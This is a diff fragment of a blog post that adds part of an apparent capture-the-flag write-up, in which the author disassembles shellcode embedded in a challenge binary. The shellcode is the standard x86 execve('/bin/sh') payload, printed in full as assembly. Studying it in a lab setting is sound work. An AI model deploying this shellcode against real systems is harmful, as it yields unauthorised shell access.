sjmini/sjmini.github.io/_posts/2017-03-07-sample-post-with-all-elements.markdown

 }
 ```

-#### This problem,, we could only modify 1 byte of shellcode, and we must leverage this vulnerability to obtain privileged shell.
+If you analyzes binary file, you could figure out that we could modify 1 byte of shellcode, and we must leverage this vulnerability to obtain privileged shell.
+The shellcode is embedded in the binary and I have checked whether it is valid shellcode as below:

+xor    %eax,%eax
+push   %eax
+push   $0x68732f2f
+push   $0x6e69622f
+mov    %esp,%ebx
+push   %eax
+push   %ebx
+mov    %esp,%ecx
+mov    $0xb,%al
+int    $0x80

+Indeed it is valud shellcoded.

 ## Headings